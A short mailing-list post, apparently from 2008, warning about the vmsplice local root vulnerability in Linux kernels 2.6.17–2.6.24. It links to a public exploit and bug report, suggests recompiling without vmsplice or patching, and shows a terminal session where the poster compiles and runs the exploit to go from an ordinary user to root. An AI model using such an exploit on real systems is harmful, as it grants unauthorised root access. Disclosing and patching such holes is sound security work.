sup guys,
i thought i should share this
2 days ago a vulnerability was reported in kernel 2.6.17 - 2.6.24. a
local root exploit can be found at
https://bugs.gentoo.org/attachment.cgi?id=143059
and more information at
https://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587

to fix this you can recompile the kernel without vmsplice; other patches
are available

i tested it on gutsy x86_64 and it worked..

[EMAIL PROTECTED]:/tmp$ gcc linux_vmsplice.c -o exploit
[EMAIL PROTECTED]:/tmp$ whoami
ag
[EMAIL PROTECTED]:/tmp$ ./exploit
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2b66fdb34000 .. 0x2b66fdb66000
[+] root
[EMAIL PROTECTED]:/tmp# whoami
root
[EMAIL PROTECTED]:/tmp#


cheers..

-- 
\x41\x61\x67
